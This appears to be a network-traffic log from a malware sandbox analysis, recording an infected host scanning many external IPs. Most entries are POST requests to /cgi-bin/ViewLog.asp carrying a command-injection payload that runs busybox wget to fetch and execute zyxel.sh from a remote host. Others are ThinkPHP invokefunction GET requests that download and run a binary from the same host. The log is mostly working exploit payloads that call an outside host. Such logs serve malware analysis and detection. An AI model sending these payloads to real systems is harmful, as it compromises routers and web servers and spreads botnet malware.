                                                        Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e
                                                        Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        478192.168.2.144568694.45.223.1828080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:59.123925924 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:59.352684975 CET111INHTTP/1.1 404 Not Found
                                                        Connection: close
                                                        Content-Type: text/plain
                                                        Transfer-Encoding: chunked


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        479192.168.2.144132231.135.195.838080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:59.125102997 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:59.354401112 CET714INHTTP/1.1 401 Unauthorized
                                                        Access-Control-Allow-Credentials: true
                                                        Access-Control-Allow-Headers: Accept, Accept-Encoding, Authorization, Cache-Control, Content-Type, Content-Length, Origin, X-Real-IP, X-CSRF-Token
                                                        Access-Control-Allow-Methods: GET, POST, PATCH, PUT, DELETE, OPTIONS
                                                        Access-Control-Allow-Origin: http://panel2.kawiarniahost.pl
                                                        Access-Control-Max-Age: 7200
                                                        Access-Control-Request-Private-Network: true
                                                        Content-Type: application/json; charset=utf-8
                                                        Www-Authenticate: Bearer
                                                        X-Request-Id: 4a5d4c08-48c7-4fa9-8628-581a15460421
                                                        Date: Wed, 14 Feb 2024 08:33:59 GMT
                                                        Content-Length: 77
                                                        Connection: close
                                                        Data Raw: 7b 22 65 72 72 6f 72 22 3a 22 54 68 65 20 72 65 71 75 69 72 65 64 20 61 75 74 68 6f 72 69 7a 61 74 69 6f 6e 20 68 65 61 64 73 20 77 65 72 65 20 6e 6f 74 20 70 72 65 73 65 6e 74 20 69 6e 20 74 68 65 20 72 65 71 75 65 73 74 2e 22 7d
                                                        Data Ascii: {"error":"The required authorization heads were not present in the request."}


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        480192.168.2.143453094.122.209.1018080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:59.144016027 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        481192.168.2.144297094.103.83.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:59.362812042 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:59.603427887 CET59INHTTP/1.1 400 Bad Request
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        482192.168.2.143765894.123.151.1738080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:59.389120102 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        483192.168.2.143750094.122.77.2138080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:59.389204979 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        484192.168.2.144409631.200.32.2548080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:59.391851902 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        485192.168.2.145920494.187.119.2448080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:59.396076918 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        486192.168.2.1444670112.46.224.10480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:00.539869070 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        487192.168.2.145869495.216.164.4380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:00.759824991 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        488192.168.2.143959295.140.229.4480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:00.761882067 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:00.983937025 CET269INHTTP/1.1 400 Bad Request
                                                        Server: EdgePrism/5.1.7.0
                                                        Mime-Version: 1.0
                                                        Date: Wed, 14 Feb 2024 08:34:00 GMT
                                                        Content-Type: text/plain
                                                        Expires: Wed, 14 Feb 2024 08:34:00 GMT
                                                        X-LLID: c50c1ef1639c0464efdf453d1bfc2089
                                                        Content-Length: 0
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        489192.168.2.143875231.136.152.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:01.866251945 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:02.502705097 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:03.782632113 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:06.438642025 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:11.558343887 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:21.797926903 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:43.301147938 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:24.259370089 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        490192.168.2.145721062.31.216.2328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:01.884321928 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:03.014663935 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:03.229357958 CET711INHTTP/1.0 404 Not Found !!!
                                                        Cache-Control: no-cache, no-store, must-revalidate
                                                        Pragma: no-cache
                                                        Content-type: text/html
                                                        <html> <head> <title>404 Not Found !!!</title> </head><body><div align="center"><center><table border="1" cellspacing="0" width="100%"> <tr> <td width="100%" bgcolor="#0000A0"> <p align="center"><font color="#FFFFFF" face="Arial"> <strong>404 Not Found !!!</strong></font></td> </tr> <tr> <td width="100%" bgcolor="#F3F3F3" bordercolor="#000080" bordercolordark="#000080"> <p align="center"><font face="Times New Romain" color="#000000"> <strong>The requested URL was not found on this server.</strong></font></td> </tr></table></body></html>
                                                        Data Raw:
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        491192.168.2.144046894.120.243.2238080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:01.910916090 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        492192.168.2.145464094.122.73.898080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:01.912008047 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        493192.168.2.145270694.122.95.528080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:01.913901091 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        494192.168.2.145953262.29.35.1408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:01.913974047 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        495192.168.2.144807894.23.19.1028080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.078733921 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:02.292169094 CET601INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:02 GMT
                                                        Server: Apache/2.4.25 (Debian)
                                                        Strict-Transport-Security: max-age=15768000
                                                        Content-Length: 362
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 52 65 61 73 6f 6e 3a 20 59 6f 75 27 72 65 20 73 70 65 61 6b 69 6e 67 20 70 6c 61 69 6e 20 48 54 54 50 20 74 6f 20 61 6e 20 53 53 4c 2d 65 6e 61 62 6c 65 64 20 73 65 72 76 65 72 20 70 6f 72 74 2e 3c 62 72 20 2f 3e 0a 20 49 6e 73 74 65 61 64 20 75 73 65 20 74 68 65 20 48 54 54 50 53 20 73 63 68 65 6d 65 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 55 52 4c 2c 20 70 6c 65 61 73 65 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        496192.168.2.145531662.76.114.188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:02.150648117 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
